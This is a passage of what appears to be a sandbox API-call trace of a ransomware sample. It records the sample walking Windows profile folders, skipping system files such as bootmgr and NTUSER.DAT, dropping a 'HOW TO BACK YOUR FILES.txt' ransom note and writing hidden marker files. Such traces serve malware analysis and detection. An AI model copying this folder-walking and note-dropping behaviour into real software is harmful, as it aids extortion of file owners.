-1 [0064.999] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0064.999] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0064.999] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0064.999] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0064.999] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0064.999] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0064.999] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0064.999] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0064.999] lstrcpyW (in: lpString1=0x130ebf4, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0064.999] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0064.999] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122260 [0064.999] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd4) returned 0xefb28 [0064.999] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122268 | out: ListHead=0xf68b0, ListEntry=0x122268) returned 0x122328 [0064.999] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x8a703502, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd12830e2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8a703502, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0065.000] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.000] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.000] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0065.000] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0065.000] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0065.000] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0065.000] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0065.000] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0065.000] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0065.000] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0065.000] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0065.000] lstrcpyW (in: lpString1=0x130ebf4, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0065.000] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0065.000] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122140 [0065.000] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd4) returned 0x11dff0 [0065.000] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122148 | out: ListHead=0xf68b0, ListEntry=0x122148) returned 0x122268 [0065.000] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc0ef72fe, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd12c7936, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc0ef72fe, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0065.000] lstrcmpiW (lpString1="Microsoft", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.000] lstrcmpiW (lpString1="Microsoft", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.000] lstrcmpiW (lpString1="Microsoft", lpString2="Rabbit4444.exe") returned -1 [0065.000] lstrcmpiW (lpString1="Microsoft", lpString2=".") returned 1 [0065.000] lstrcmpiW (lpString1="Microsoft", lpString2="..") returned 1 [0065.000] lstrcmpiW (lpString1="Microsoft", lpString2="windows") returned -1 [0065.001] lstrcmpiW (lpString1="Microsoft", lpString2="bootmgr") returned 1 [0065.001] lstrcmpiW (lpString1="Microsoft", lpString2="pagefile.sys") returned -1 [0065.001] lstrcmpiW (lpString1="Microsoft", lpString2="boot") returned 1 [0065.001] lstrcmpiW (lpString1="Microsoft", lpString2="ids.txt") returned 1 [0065.001] lstrcmpiW (lpString1="Microsoft", lpString2="NTUSER.DAT") returned -1 [0065.001] lstrcpyW (in: lpString1=0x130ebf4, lpString2="Microsoft" | out: lpString1="Microsoft") returned="Microsoft" [0065.001] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222e0 [0065.001] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd0) returned 0x108688 [0065.001] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222e8 | out: ListHead=0xf68b0, ListEntry=0x1222e8) returned 0x122148 [0065.001] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a703502, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd12c905b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8a703502, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0065.001] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.001] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.001] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0065.001] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0065.001] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0065.001] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0065.001] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0065.001] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0065.001] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0065.001] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0065.001] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0065.001] lstrcpyW (in: lpString1=0x130ebf4, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0065.001] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122160 [0065.001] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc6) returned 0x116110 [0065.001] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122168 | out: ListHead=0xf68b0, ListEntry=0x122168) returned 0x1222e8 [0065.001] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a703502, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd12c905b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8a703502, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0065.001] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0065.001] lstrcpyW (in: lpString1=0x130ebf4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.001] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0065.002] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0065.002] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.003] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.003] CloseHandle (hObject=0x2a0) returned 1 [0065.003] CloseHandle (hObject=0x2cc) returned 1 [0065.003] GetCurrentThreadId () returned 0xd98 [0065.003] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122168 [0065.003] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp" [0065.003] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116110 | out: hHeap=0xe0000) returned 1 [0065.003] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122160 | out: hHeap=0xe0000) returned 1 [0065.003] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp" [0065.003] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp\\" [0065.003] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0065.003] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0065.005] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.007] FlushFileBuffers (hFile=0x2cc) returned 1 [0065.008] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.008] CloseHandle (hObject=0x2cc) returned 1 [0065.009] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp") returned 98 [0065.009] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.009] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a703502, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd12c905b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf011c9d1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1026d0 [0065.009] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.009] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.009] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.009] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.009] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a703502, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd12c905b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf011c9d1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.009] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.009] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.009] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.009] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.009] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.009] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf011c9d1, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf011c9d1, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf011c9d1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.009] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.009] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.009] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf011c9d1, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf011c9d1, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf011c9d1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.009] FindClose (in: hFindFile=0x1026d0 | out: hFindFile=0x1026d0) returned 1 [0065.009] lstrcpyW (in: lpString1=0x130ebfe, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.010] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0065.010] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0065.010] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.010] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.010] CloseHandle (hObject=0x2a0) returned 1 [0065.011] CloseHandle (hObject=0x2cc) returned 1 [0065.011] GetCurrentThreadId () returned 0xd98 [0065.011] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222e8 [0065.011] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft" [0065.011] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108688 | out: hHeap=0xe0000) returned 1 [0065.011] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222e0 | out: hHeap=0xe0000) returned 1 [0065.011] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft" [0065.011] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft\\" [0065.011] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft\\.BFC0E91B00AE8A0620D3" [0065.011] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\ac\\microsoft\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0065.012] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.014] FlushFileBuffers (hFile=0x2cc) returned 1 [0065.015] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.015] CloseHandle (hObject=0x2cc) returned 1 [0065.016] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft") returned 103 [0065.016] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.016] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc0ef72fe, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd12c7936, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf011c9d1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0065.016] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.016] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.016] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.016] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.016] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc0ef72fe, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd12c7936, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf011c9d1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.016] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.016] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.016] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.016] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.016] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.016] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf011c9d1, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf011c9d1, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0142b22, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.016] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.016] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.016] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc0ef72fe, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc0ef72fe, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc0ef72fe, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0065.017] lstrcmpiW (lpString1="Windows", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.017] lstrcmpiW (lpString1="Windows", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.017] lstrcmpiW (lpString1="Windows", lpString2="Rabbit4444.exe") returned 1 [0065.017] lstrcmpiW (lpString1="Windows", lpString2=".") returned 1 [0065.017] lstrcmpiW (lpString1="Windows", lpString2="..") returned 1 [0065.017] lstrcmpiW (lpString1="Windows", lpString2="windows") returned 0 [0065.017] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc0ef72fe, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc0ef72fe, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc0ef72fe, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0065.017] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0065.017] lstrcpyW (in: lpString1=0x130ec08, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.017] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\ac\\microsoft\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0065.018] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0065.019] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.019] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.019] CloseHandle (hObject=0x2a0) returned 1 [0065.019] CloseHandle (hObject=0x2cc) returned 1 [0065.019] GetCurrentThreadId () returned 0xd98 [0065.019] RtlInterlockedPopEntrySList (in: 